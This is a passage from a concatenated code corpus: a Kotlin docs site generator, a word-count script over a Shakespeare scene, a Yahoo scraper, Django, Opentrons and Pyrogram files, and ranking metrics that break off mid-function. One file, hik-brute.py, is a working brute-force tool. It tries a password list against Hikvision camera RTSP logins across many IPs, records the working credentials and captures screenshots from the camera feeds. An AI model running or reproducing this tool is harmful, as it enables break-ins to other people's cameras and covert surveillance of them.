page_path = page.meta['redirect_path']
if page_path.startswith('https://') or page_path.startswith('http://'):
return render_template('redirect.html', url=page_path)
else:
return render_template('redirect.html', url=url_for('page', page_path = page_path))
if 'date' in page.meta and page['date'] is not None:
page.meta['formatted_date'] = page.meta['date'].strftime('%d %B %Y')
if page.meta['formatted_date'].startswith('0'):
page.meta['formatted_date'] = page.meta['formatted_date'][1:]
if 'github_edit_url' in page.meta:
edit_on_github_url = page.meta['github_edit_url']
else:
edit_on_github_url = app.config['EDIT_ON_GITHUB_URL'] + app.config['FLATPAGES_ROOT'] + "/" + page_path + \
app.config['FLATPAGES_EXTENSION']
assert_valid_git_hub_url(edit_on_github_url, page_path)
template = page.meta["layout"] if 'layout' in page.meta else 'default.html'
if not template.endswith(".html"):
template += ".html"
if build_check_links:
validate_links_weak(page, page_path)
return render_template(
template,
page=page,
baseurl="",
edit_on_github_url=edit_on_github_url,
)
def validate_links_weak(page, page_path):
for link in page.parsed_html.select('a'):
if 'href' not in link.attrs:
continue
href = urlparse(urljoin('/' + page_path, link['href']))
if href.scheme != '':
continue
endpoint, params = url_adapter.match(href.path, 'GET', query_args={})
if endpoint != 'page' and endpoint != 'get_index_page':
response = app.test_client().get(href.path)
if response.status_code == 404:
build_errors.append("Broken link: " + str(href.path) + " on page " + page_path)
continue
referenced_page = pages.get(params['page_path'])
if referenced_page is None:
build_errors.append("Broken link: " + str(href.path) + " on page " + page_path)
continue
if href.fragment == '':
continue
ids = []
for x in referenced_page.parsed_html.select('h1,h2,h3,h4'):
try:
ids.append(x['id'])
except KeyError:
pass
for x in referenced_page.parsed_html.select('a'):
try:
ids.append(x['name'])
except KeyError:
pass
if href.fragment not in ids:
build_errors.append("Bad anchor: " + str(href.fragment) + " on page " + page_path)
if not build_mode and len(build_errors) > 0:
errors_copy = []
for item in build_errors:
errors_copy.append(item)
build_errors.clear()
raise Exception("Validation errors " + str(len(errors_copy)) + ":\n\n" +
"\n".join(str(item) for item in errors_copy))
@freezer.register_generator
def page():
for page in pages:
yield {'page_path': page.path}
@app.route('/<path:page_path>.html')
def page(page_path):
return process_page(page_path)
@app.route('/404.html')
def page_404():
return render_template('pages/404.html')
@freezer.register_generator
def api_page():
api_folder = path.join(root_folder, 'api')
for root, dirs, files in os.walk(api_folder):
for file in files:
yield {'page_path': path.join(path.relpath(root, api_folder), file).replace(os.sep, '/')}
class RedirectTemplateView(View):
def __init__(self, url):
self.redirect_url = url
def dispatch_request(self):
return render_template('redirect.html', url=self.redirect_url)
def generate_redirect_pages():
redirects_folder = path.join(root_folder, 'redirects')
for root, dirs, files in os.walk(redirects_folder):
for file in files:
if not file.endswith(".yml"):
continue
redirects_file_path = path.join(redirects_folder, file)
with open(redirects_file_path, encoding="UTF-8") as stream:
try:
redirects = yaml.load(stream, Loader=FullLoader)
for entry in redirects:
url_to = entry["to"]
url_from = entry["from"]
url_list = url_from if isinstance(url_from, list) else [url_from]
for url in url_list:
app.add_url_rule(url, view_func=RedirectTemplateView.as_view(url, url=url_to))
except yaml.YAMLError as exc:
sys.stderr.write('Cant parse data file ' + file + ': ')
sys.stderr.write(str(exc))
sys.exit(-1)
except IOError as exc:
sys.stderr.write('Cant read data file ' + file + ': ')
sys.stderr.write(str(exc))
sys.exit(-1)
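# Shape of a redirects YAML file consumed by the loop above (illustrative
# example only, not an actual file from this repository):
#   - from: /old-page.html
#     to: /new-page.html
#   - from: [/obsolete-a.html, /obsolete-b.html]
#     to: https://example.com/moved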
@app.errorhandler(404)
def page_not_found(e):
return render_template('pages/404.html'), 404
app.register_error_handler(404, page_not_found)
@app.route('/api/<path:page_path>')
def api_page(page_path):
path_other, ext = path.splitext(page_path)
if ext == '.html':
return process_api_page(page_path[:-5])
elif path.basename(page_path) == "package-list" or ext:
return respond_with_package_list(page_path)
elif not page_path.endswith('/'):
page_path += '/'
return process_api_page(page_path + 'index')
def process_api_page(page_path):
return render_template(
'api.html',
page=get_api_page(build_mode, page_path)
)
def respond_with_package_list(page_path):
file_path = path.join(root_folder, 'api', page_path)
if not path.exists(file_path):
return make_response(path.basename(page_path) + " not found", 404)
return send_file(file_path, mimetype="text/plain")
@app.route('/assets/<path:path>')
def asset(path):
return send_from_directory('assets', path)
@app.route('/assets/images/tutorials/<path:filename>')
def tutorial_img(filename):
return send_from_directory(path.join('assets', 'images', 'tutorials'), filename)
@freezer.register_generator
def asset():
for filename in walk_directory(path.join(root_folder, "assets")):
yield {'path': filename}
@app.route('/<path:page_path>')
def get_index_page(page_path):
"""
Handle requests which urls don't end with '.html' (for example, '/doc/')
We don't need any generator here, because such urls are equivalent to the same urls
with 'index.html' at the end.
:param page_path: str
:return: str
"""
if not page_path.endswith('/'):
page_path += '/'
return process_page(page_path + 'index')
generate_redirect_pages()
@app.after_request
def add_header(response):
# after_request handlers receive the response object; note that the final
# Cache-Control assignment below overrides the no-cache values set first.
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Pragma"] = "no-cache"
response.headers["Expires"] = "0"
response.headers['Cache-Control'] = 'public, max-age=0'
return response
if __name__ == '__main__':
print("\n\n\nRunning new KotlinWebSite generator/dev-mode:\n")
argv_copy = []
for arg in sys.argv:
print("arg: " + arg)
if arg == "--ignore-stdlib":
ignore_stdlib = True
elif arg == "--no-check-links":
build_check_links = False
elif arg == "--editable":
build_contenteditable = True
else:
argv_copy.append(arg)
print("\n\n")
print("ignore_stdlib: " + str(ignore_stdlib))
print("build_check_links: " + str(build_check_links))
print("build_contenteditable: " + str(build_contenteditable))
print("\n\n")
set_replace_simple_code(build_contenteditable)
with (open(path.join(root_folder, "_nav-mapped.yml"), 'w')) as output:
yaml.dump(get_nav_impl(), output)
if len(argv_copy) > 1:
if argv_copy[1] == "build":
build_mode = True
urls = freezer.freeze()
if len(build_errors) > 0:
for error in build_errors:
sys.stderr.write(error + '\n')
sys.exit(-1)
elif argv_copy[1] == "sitemap":
generate_sitemap(get_dist_pages())
# temporary sitemap
generate_temporary_sitemap()
elif argv_copy[1] == "index":
build_search_indices(get_dist_pages())
elif argv_copy[1] == "reference-pdf":
generate_pdf("kotlin-docs.pdf", site_data)
else:
print("Unknown argument: " + argv_copy[1])
sys.exit(1)
else:
app.run(host="0.0.0.0", debug=True, threaded=True, **{"extra_files": {
'/src/data/_nav.yml',
*glob.glob("/src/pages-includes/**/*", recursive=True),
}})
| 32.096715 | 114 | 0.648815 | [
"Apache-2.0"
] | Chinay-Domitrix/kotlin-web-site | kotlin-website.py | 17,589 | Python |
# -*- coding: utf-8 -*-
class TestInvalidPathTweenFactory:
def test_it_400s_if_the_requested_path_isnt_utf8(self, app):
app.get("/%c5", status=400)
| 23.142857 | 64 | 0.697531 | [
"BSD-2-Clause"
] | 13625025773/h | tests/functional/test_tweens.py | 162 | Python |
"""
Simple million word count program.
The main idea is that Python pairs each word
with the number of times
that word appears
Credit to William J. Turkel and Adam Crymble for the word
frequency code used below. I just merged the two ideas.
"""
wordstring = '''SCENE I. Yorkshire. Gaultree Forest.
Enter the ARCHBISHOP OF YORK, MOWBRAY, LORD HASTINGS, and others
ARCHBISHOP OF YORK
What is this forest call'd?
HASTINGS
'Tis Gaultree Forest, an't shall please your grace.
ARCHBISHOP OF YORK
Here stand, my lords; and send discoverers forth
To know the numbers of our enemies.
HASTINGS
We have sent forth already.
ARCHBISHOP OF YORK
'Tis well done.
My friends and brethren in these great affairs,
I must acquaint you that I have received
New-dated letters from Northumberland;
Their cold intent, tenor and substance, thus:
Here doth he wish his person, with such powers
As might hold sortance with his quality,
The which he could not levy; whereupon
He is retired, to ripe his growing fortunes,
To Scotland: and concludes in hearty prayers
That your attempts may overlive the hazard
And fearful melting of their opposite.
MOWBRAY
Thus do the hopes we have in him touch ground
And dash themselves to pieces.
Enter a Messenger
HASTINGS
Now, what news?
Messenger
West of this forest, scarcely off a mile,
In goodly form comes on the enemy;
And, by the ground they hide, I judge their number
Upon or near the rate of thirty thousand.
MOWBRAY
The just proportion that we gave them out
Let us sway on and face them in the field.
ARCHBISHOP OF YORK
What well-appointed leader fronts us here?
Enter WESTMORELAND
MOWBRAY
I think it is my Lord of Westmoreland.
WESTMORELAND
Health and fair greeting from our general,
The prince, Lord John and Duke of Lancaster.
ARCHBISHOP OF YORK
Say on, my Lord of Westmoreland, in peace:
What doth concern your coming?
WESTMORELAND
Then, my lord,
Unto your grace do I in chief address
The substance of my speech. If that rebellion
Came like itself, in base and abject routs,
Led on by bloody youth, guarded with rags,
And countenanced by boys and beggary,
I say, if damn'd commotion so appear'd,
In his true, native and most proper shape,
You, reverend father, and these noble lords
Had not been here, to dress the ugly form
Of base and bloody insurrection
With your fair honours. You, lord archbishop,
Whose see is by a civil peace maintained,
Whose beard the silver hand of peace hath touch'd,
Whose learning and good letters peace hath tutor'd,
Whose white investments figure innocence,
The dove and very blessed spirit of peace,
Wherefore do you so ill translate ourself
Out of the speech of peace that bears such grace,
Into the harsh and boisterous tongue of war;
Turning your books to graves, your ink to blood,
Your pens to lances and your tongue divine
To a trumpet and a point of war?
ARCHBISHOP OF YORK
Wherefore do I this? so the question stands.
Briefly to this end: we are all diseased,
And with our surfeiting and wanton hours
Have brought ourselves into a burning fever,
And we must bleed for it; of which disease
Our late king, Richard, being infected, died.
But, my most noble Lord of Westmoreland,
I take not on me here as a physician,
Nor do I as an enemy to peace
Troop in the throngs of military men;
But rather show awhile like fearful war,
To diet rank minds sick of happiness
And purge the obstructions which begin to stop
Our very veins of life. Hear me more plainly.
I have in equal balance justly weigh'd
What wrongs our arms may do, what wrongs we suffer,
And find our griefs heavier than our offences.
We see which way the stream of time doth run,
And are enforced from our most quiet there
By the rough torrent of occasion;
And have the summary of all our griefs,
When time shall serve, to show in articles;
Which long ere this we offer'd to the king,
And might by no suit gain our audience:
When we are wrong'd and would unfold our griefs,
We are denied access unto his person
Even by those men that most have done us wrong.
The dangers of the days but newly gone,
Whose memory is written on the earth
With yet appearing blood, and the examples
Of every minute's instance, present now,
Hath put us in these ill-beseeming arms,
Not to break peace or any branch of it,
But to establish here a peace indeed,
Concurring both in name and quality.
WESTMORELAND
When ever yet was your appeal denied?
Wherein have you been galled by the king?
What peer hath been suborn'd to grate on you,
That you should seal this lawless bloody book
Of forged rebellion with a seal divine
And consecrate commotion's bitter edge?
ARCHBISHOP OF YORK
My brother general, the commonwealth,
To brother born an household cruelty,
I make my quarrel in particular.
WESTMORELAND
There is no need of any such redress;
Or if there were, it not belongs to you.
MOWBRAY
Why not to him in part, and to us all
That feel the bruises of the days before,
And suffer the condition of these times
To lay a heavy and unequal hand
Upon our honours?
WESTMORELAND
O, my good Lord Mowbray,
Construe the times to their necessities,
And you shall say indeed, it is the time,
And not the king, that doth you injuries.
Yet for your part, it not appears to me
Either from the king or in the present time
That you should have an inch of any ground
To build a grief on: were you not restored
To all the Duke of Norfolk's signories,
Your noble and right well remember'd father's?
MOWBRAY
What thing, in honour, had my father lost,
That need to be revived and breathed in me?
The king that loved him, as the state stood then,
Was force perforce compell'd to banish him:
And then that Harry Bolingbroke and he,
Being mounted and both roused in their seats,
Their neighing coursers daring of the spur,
Their armed staves in charge, their beavers down,
Their eyes of fire sparking through sights of steel
And the loud trumpet blowing them together,
Then, then, when there was nothing could have stay'd
My father from the breast of Bolingbroke,
O when the king did throw his warder down,
His own life hung upon the staff he threw;
Then threw he down himself and all their lives
That by indictment and by dint of sword
Have since miscarried under Bolingbroke.
WESTMORELAND
You speak, Lord Mowbray, now you know not what.
The Earl of Hereford was reputed then
In England the most valiant gentlemen:
Who knows on whom fortune would then have smiled?
But if your father had been victor there,
He ne'er had borne it out of Coventry:
For all the country in a general voice
Cried hate upon him; and all their prayers and love
Were set on Hereford, whom they doted on
And bless'd and graced indeed, more than the king.
But this is mere digression from my purpose.
Here come I from our princely general
To know your griefs; to tell you from his grace
That he will give you audience; and wherein
It shall appear that your demands are just,
You shall enjoy them, every thing set off
That might so much as think you enemies.
MOWBRAY
But he hath forced us to compel this offer;
And it proceeds from policy, not love.
WESTMORELAND
Mowbray, you overween to take it so;
This offer comes from mercy, not from fear:
For, lo! within a ken our army lies,
Upon mine honour, all too confident
To give admittance to a thought of fear.
Our battle is more full of names than yours,
Our men more perfect in the use of arms,
Our armour all as strong, our cause the best;
Then reason will our heart should be as good
Say you not then our offer is compell'd.
MOWBRAY
Well, by my will we shall admit no parley.
WESTMORELAND
That argues but the shame of your offence:
A rotten case abides no handling.
HASTINGS
Hath the Prince John a full commission,
In very ample virtue of his father,
To hear and absolutely to determine
Of what conditions we shall stand upon?
WESTMORELAND
That is intended in the general's name:
I muse you make so slight a question.
ARCHBISHOP OF YORK
Then take, my Lord of Westmoreland, this schedule,
For this contains our general grievances:
Each several article herein redress'd,
All members of our cause, both here and hence,
That are insinew'd to this action,
Acquitted by a true substantial form
And present execution of our wills
To us and to our purposes confined,
We come within our awful banks again
And knit our powers to the arm of peace.
WESTMORELAND
This will I show the general. Please you, lords,
In sight of both our battles we may meet;
And either end in peace, which God so frame!
Or to the place of difference call the swords
Which must decide it.
ARCHBISHOP OF YORK
My lord, we will do so.
Exit WESTMORELAND
MOWBRAY
There is a thing within my bosom tells me
That no conditions of our peace can stand.
HASTINGS
Fear you not that: if we can make our peace
Upon such large terms and so absolute
As our conditions shall consist upon,
Our peace shall stand as firm as rocky mountains.
MOWBRAY
Yea, but our valuation shall be such
That every slight and false-derived cause,
Yea, every idle, nice and wanton reason
Shall to the king taste of this action;
That, were our royal faiths martyrs in love,
We shall be winnow'd with so rough a wind
That even our corn shall seem as light as chaff
And good from bad find no partition.
ARCHBISHOP OF YORK
No, no, my lord. Note this; the king is weary
Of dainty and such picking grievances:
For he hath found to end one doubt by death
Revives two greater in the heirs of life,
And therefore will he wipe his tables clean
And keep no tell-tale to his memory
That may repeat and history his loss
To new remembrance; for full well he knows
He cannot so precisely weed this land
As his misdoubts present occasion:
His foes are so enrooted with his friends
That, plucking to unfix an enemy,
He doth unfasten so and shake a friend:
So that this land, like an offensive wife
That hath enraged him on to offer strokes,
As he is striking, holds his infant up
And hangs resolved correction in the arm
That was uprear'd to execution.
HASTINGS
Besides, the king hath wasted all his rods
On late offenders, that he now doth lack
The very instruments of chastisement:
So that his power, like to a fangless lion,
May offer, but not hold.
ARCHBISHOP OF YORK
'Tis very true:
And therefore be assured, my good lord marshal,
If we do now make our atonement well,
Our peace will, like a broken limb united,
Grow stronger for the breaking.
MOWBRAY
Be it so.
Here is return'd my Lord of Westmoreland.
Re-enter WESTMORELAND
WESTMORELAND
The prince is here at hand: pleaseth your lordship
To meet his grace just distance 'tween our armies.
MOWBRAY
Your grace of York, in God's name then, set forward.
ARCHBISHOP OF YORK
Before, and greet his grace: my lord, we come.
Exeunt'''
wordlist = wordstring.split()
wordfreq = [wordlist.count(w) for w in wordlist]
print("String\n {} \n".format(wordstring))
print("List\n {} \n".format(str(wordlist)))
print("Frequencies\n {} \n".format(str(wordfreq)))
print("Pairs\n {}".format(str(dict(zip(wordlist, wordfreq)))))
print("Edit I made to show how to pull from IntellijIdea")
print("Adding my two cents here")
| 36.154605 | 64 | 0.786189 | [
"MIT"
] | onepseudoxy/Python | CountMillionCharacter.py | 10,991 | Python |
""" YQL out mkt cap and currency to fill out yahoo table """
""" TODO: retreive lists of 100 symbols from database and update"""
""" Results are intented to use while matching yahoo tickers, which one has mkt cap? which ones has sector? """
import mysql.connector
import stockretriever
import sys
import time
from random import randint
cnx = mysql.connector.connect(user='root', password='root', database='yahoo')
cursor = cnx.cursor()
sleeptime = 10
add_market_cap = ("INSERT INTO stocks "
"(symbol, market_cap, currency) "
"VALUES (%s, %s, %s) "
"ON DUPLICATE KEY UPDATE market_cap=VALUES(market_cap), currency=VALUES(currency)")
get_new_symbols = """SELECT symbol
FROM yahoo.stocks
WHERE market_cap is NULL
and currency is NULL"""
try:
cursor.execute(get_new_symbols)
except mysql.connector.errors.IntegrityError, e:
print(e)
for result in cursor.fetchall():
for symbol in result:
data = []
market_cap = ""
currency = ""
try:
data = stockretriever.get_current_info([symbol])
except TypeError as e:
#print "Typerror {0}: {1}".format(e.errno, e.strerror)
print "Type error, could not fetch current info on ", symbol
except Exception as e:
print(e)
try:
currency = data['Currency']
market_cap = data['MarketCapitalization']
except Exception as e:
print "No currency or mkt cap error", e
continue
data_company = (symbol, market_cap, currency)
try:
cursor.execute(add_market_cap, data_company)
except mysql.connector.errors.IntegrityError, e:
print(e)
continue
try:
print "Success updating", symbol, currency, market_cap
except UnicodeEncodeError as e:
print e
cnx.commit()
time.sleep(randint(0,sleeptime))
cursor.close()
cnx.close()
| 27.805556 | 111 | 0.618881 | [
"BSD-3-Clause"
] | pettersoderlund/fondout | script/StockScraper-master/update_market_cap_yahoo.py | 2,002 | Python |
import os
import time
import datetime
import socket
import platform
import sys
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore, Back, Style
def rtspbrute(ip1):
log=open("logs",'r')
if ip1 not in log:
flag=0
ip1 = ip1[:-1]
os.system("mkdir -p Hikvision/%s 2> /dev/null"%(str(ip1).strip()))
dat=datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
os.system("mkdir Hikvision/%s/%s 2>/dev/null" %(ip1.strip(),dat.strip()))
for passw in passread:
chann=1
passw = passw[:-1]
print Fore.YELLOW+"\nRunning '%s' with password '%s'\n" %(str(ip1).strip(), str(passw))
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/101/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s_temp.jpg " %(str(passw).strip(),str(ip1).strip(),str(ip1).strip(),ip1.strip()))
if os.path.exists("Hikvision/%s/%s_temp.jpg" %(str(ip1).strip(),str(ip1).strip())):
print Fore.GREEN + "Found Access of %s with password %s" %(str(ip1).strip(), str(passw))
print(Style.RESET_ALL)
access = open("hik-access-list","a")
print >> access, ("rtsp://admin:%s@%s:554/Streaming/Channels/101/" %(str(passw),str(ip1).strip()))
access.close()
log = open("logs","a")
print >> log, (str(ip1))
flag=1
while chann<=3:
print "Trying to take screenshot of Channel No. "+str(chann)
os.system("ffmpeg -v quiet -stimeout 7000000 -rtsp_transport tcp -y -i rtsp://admin:%s@%s:554/Streaming/Channels/%s01/ -ss 00:00:01.50 -vframes 1 Hikvision/%s/%s/%s_%s.jpg " %(str(passw).strip(),str(ip1).strip(),str(chann),str(ip1).strip(),str(dat).strip(),ip1.strip(),str(chann)) )
chann=chann+1
if flag == 1:
break
return 1
if __name__ == "__main__":
iplist = sys.argv[1]
f = open(iplist,"r")
ip = f.readlines()
passlist = sys.argv[2]
password = open(passlist,"r")
passread = password.readlines()
access = open("hik-access-list","w")
access.close()
pool = ThreadPool(100)
results = pool.map(rtspbrute, ip)
pool.close()
pool.join()
os.system("find Hikvision/ -type d -empty -delete")
os.system("python pics-viewer.py Hikvision")
os.system("mv index.html Hikvision.html")
print Fore.CYAN+"\n\nFINISHED\n"
| 38.413793 | 287 | 0.658887 | [
"MIT"
] | haka110/Cam-Brute | hik-brute.py | 2,228 | Python |
# Copyright (c) 2014 eBay Software Foundation
# Copyright 2015 HP Software, LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
import horizon
from openstack_dashboard.dashboards.project import dashboard
class Clusters(horizon.Panel):
name = _("Clusters")
slug = 'database_clusters'
permissions = ('openstack.services.database',
'openstack.services.object-store',)
dashboard.Project.register(Clusters)
| 33.677419 | 78 | 0.733716 | [
"Apache-2.0"
] | NeCTAR-RC/trove-dashboard | trove_dashboard/content/database_clusters/panel.py | 1,044 | Python |
# Generated by Django 2.2.1 on 2019-07-06 21:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('publish', '0031_bundle_description'),
]
operations = [
migrations.CreateModel(
name='Docset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('docset_id', models.CharField(max_length=255)),
('name', models.CharField(default='', max_length=255)),
],
),
]
| 26.863636 | 114 | 0.57868 | [
"BSD-3-Clause"
] | SFDO-Tooling/sfdoc | sfdoc/publish/migrations/0032_docset.py | 591 | Python |
from functools import partial
from g_code_test_data.http.http_settings import HTTP_SETTINGS
from g_code_test_data.g_code_configuration import HTTPGCodeConfirmConfig
from robot_server.service.legacy.routers.modules import post_serial_command
from robot_server.service.legacy.models.modules import SerialCommand
from opentrons.hardware_control.emulation.magdeck import SERIAL as SERIAL_NUM
MAGDECK_CALIBRATE = HTTPGCodeConfirmConfig(
name='magdeck_calibrate',
executable=partial(
post_serial_command,
command=SerialCommand(command_type='calibrate'),
serial=SERIAL_NUM,
),
settings=HTTP_SETTINGS,
)
MAGDECK_DEACTIVATE = HTTPGCodeConfirmConfig(
name='magdeck_deactivate',
executable=partial(
post_serial_command,
command=SerialCommand(command_type='deactivate'),
serial=SERIAL_NUM,
),
settings=HTTP_SETTINGS,
)
MAGDECK_ENGAGE = HTTPGCodeConfirmConfig(
name='magdeck_engage',
executable=partial(
post_serial_command,
command=SerialCommand(command_type='engage', args=[5.1]),
serial=SERIAL_NUM,
),
settings=HTTP_SETTINGS,
)
MAGDECK_CONFIGURATIONS = [
MAGDECK_CALIBRATE,
MAGDECK_DEACTIVATE,
MAGDECK_ENGAGE,
] | 29.452381 | 77 | 0.760711 | [
"Apache-2.0"
] | MarcelRobitaille/opentrons | g-code-testing/g_code_test_data/http/modules/magdeck.py | 1,237 | Python |
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2018 Dan Tès <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.api.core import *
class ChannelAdminLogEventActionTogglePreHistoryHidden(Object):
"""Attributes:
ID: ``0x5f5c95f1``
Args:
new_value: ``bool``
"""
ID = 0x5f5c95f1
def __init__(self, new_value: bool):
self.new_value = new_value # Bool
@staticmethod
def read(b: BytesIO, *args) -> "ChannelAdminLogEventActionTogglePreHistoryHidden":
# No flags
new_value = Bool.read(b)
return ChannelAdminLogEventActionTogglePreHistoryHidden(new_value)
def write(self) -> bytes:
b = BytesIO()
b.write(Int(self.ID, False))
# No flags
b.write(Bool(self.new_value))
return b.getvalue()
| 29.12963 | 86 | 0.686586 | [
"MIT"
] | block1o1/CryptoPredicted | ENV/lib/python3.5/site-packages/pyrogram/api/types/channel_admin_log_event_action_toggle_pre_history_hidden.py | 1,574 | Python |
# https://github.com/iliaschalkidis/lmtc-eurlex57k/blob/master/metrics.py
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import f1_score
import numpy as np
def mean_precision_k(y_true, y_score, k=10):
"""Mean precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
mean precision @k : float
"""
p_ks = []
for y_t, y_s in zip(y_true, y_score):
if np.sum(y_t == 1):
p_ks.append(ranking_precision_score(y_t, y_s, k=k))
return np.mean(p_ks)
def mean_recall_k(y_true, y_score, k=10):
"""Mean recall at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
mean recall @k : float
"""
r_ks = []
for y_t, y_s in zip(y_true, y_score):
if np.sum(y_t == 1):
r_ks.append(ranking_recall_score(y_t, y_s, k=k))
return np.mean(r_ks)
def mean_ndcg_score(y_true, y_score, k=10, gains="exponential"):
"""Normalized discounted cumulative gain (NDCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
gains : str
Whether gains should be "exponential" (default) or "linear".
Returns
-------
Mean NDCG @k : float
"""
ndcg_s = []
for y_t, y_s in zip(y_true, y_score):
if np.sum(y_t == 1):
ndcg_s.append(ndcg_score(y_t, y_s, k=k, gains=gains))
return np.mean(ndcg_s)
def mean_rprecision_k(y_true, y_score, k=10):
"""Mean precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
mean precision @k : float
"""
p_ks = []
for y_t, y_s in zip(y_true, y_score):
if np.sum(y_t == 1):
p_ks.append(ranking_rprecision_score(y_t, y_s, k=k))
return np.mean(p_ks)
def ranking_recall_score(y_true, y_score, k=10):
# https://ils.unc.edu/courses/2013_spring/inls509_001/lectures/10-EvaluationMetrics.pdf
"""Recall at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
precision @k : float
"""
unique_y = np.unique(y_true)
if len(unique_y) == 1:
return ValueError("The score cannot be approximated.")
elif len(unique_y) > 2:
raise ValueError("Only supported for two relevance levels.")
pos_label = unique_y[1]
n_pos = np.sum(y_true == pos_label)
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order[:k])
n_relevant = np.sum(y_true == pos_label)
return float(n_relevant) / n_pos
def ranking_precision_score(y_true, y_score, k=10):
"""Precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
precision @k : float
"""
unique_y = np.unique(y_true)
if len(unique_y) == 1:
return ValueError("The score cannot be approximated.")
elif len(unique_y) > 2:
raise ValueError("Only supported for two relevance levels.")
pos_label = unique_y[1]
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order[:k])
n_relevant = np.sum(y_true == pos_label)
return float(n_relevant) / k
def ranking_rprecision_score(y_true, y_score, k=10):
"""Precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
precision @k : float
"""
unique_y = np.unique(y_true)
if len(unique_y) == 1:
return ValueError("The score cannot be approximated.")
elif len(unique_y) > 2:
raise ValueError("Only supported for two relevance levels.")
pos_label = unique_y[1]
n_pos = np.sum(y_true == pos_label)
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order[:k])
n_relevant = np.sum(y_true == pos_label)
# Divide by min(n_pos, k) such that the best achievable score is always 1.0.
return float(n_relevant) / min(k, n_pos)
def average_precision_score(y_true, y_score, k=10):
"""Average precision at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
Returns
-------
average precision @k : float
"""
unique_y = np.unique(y_true)
if len(unique_y) == 1:
return ValueError("The score cannot be approximated.")
elif len(unique_y) > 2:
raise ValueError("Only supported for two relevance levels.")
pos_label = unique_y[1]
n_pos = np.sum(y_true == pos_label)
order = np.argsort(y_score)[::-1][:min(n_pos, k)]
y_true = np.asarray(y_true)[order]
score = 0
for i in range(len(y_true)):
if y_true[i] == pos_label:
# Compute precision up to document i
# i.e, percentage of relevant documents up to document i.
prec = 0
for j in range(0, i + 1):
if y_true[j] == pos_label:
prec += 1.0
prec /= (i + 1.0)
score += prec
if n_pos == 0:
return 0
return score / n_pos
def dcg_score(y_true, y_score, k=10, gains="exponential"):
"""Discounted cumulative gain (DCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
gains : str
Whether gains should be "exponential" (default) or "linear".
Returns
-------
DCG @k : float
"""
order = np.argsort(y_score)[::-1]
y_true = np.take(y_true, order[:k])
if gains == "exponential":
gains = 2 ** y_true - 1
elif gains == "linear":
gains = y_true
else:
raise ValueError("Invalid gains option.")
# highest rank is 1 so +2 instead of +1
discounts = np.log2(np.arange(len(y_true)) + 2)
return np.sum(gains / discounts)
def ndcg_score(y_true, y_score, k=10, gains="exponential"):
"""Normalized discounted cumulative gain (NDCG) at rank k
Parameters
----------
y_true : array-like, shape = [n_samples]
Ground truth (true relevance labels).
y_score : array-like, shape = [n_samples]
Predicted scores.
k : int
Rank.
gains : str
Whether gains should be "exponential" (default) or "linear".
Returns
-------
NDCG @k : float
"""
best = dcg_score(y_true, y_true, k, gains)
actual = dcg_score(y_true, y_score, k, gains)
return actual / best
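# --- Editor's example (added; not part of the original module): a tiny sanity
# check of dcg_score / ndcg_score on a toy binary-relevance ranking, kept in a
# helper so importing this module stays side-effect free. The expected values
# follow directly from the formulas above.
def _ndcg_toy_example():
    """Returns roughly (1.0, 0.39): the second ranking puts an irrelevant item on top."""
    y_true = np.array([1, 0, 1])
    good_scores = np.array([0.9, 0.1, 0.8])  # both relevant items ranked first
    bad_scores = np.array([0.1, 0.9, 0.2])   # an irrelevant item ranked first
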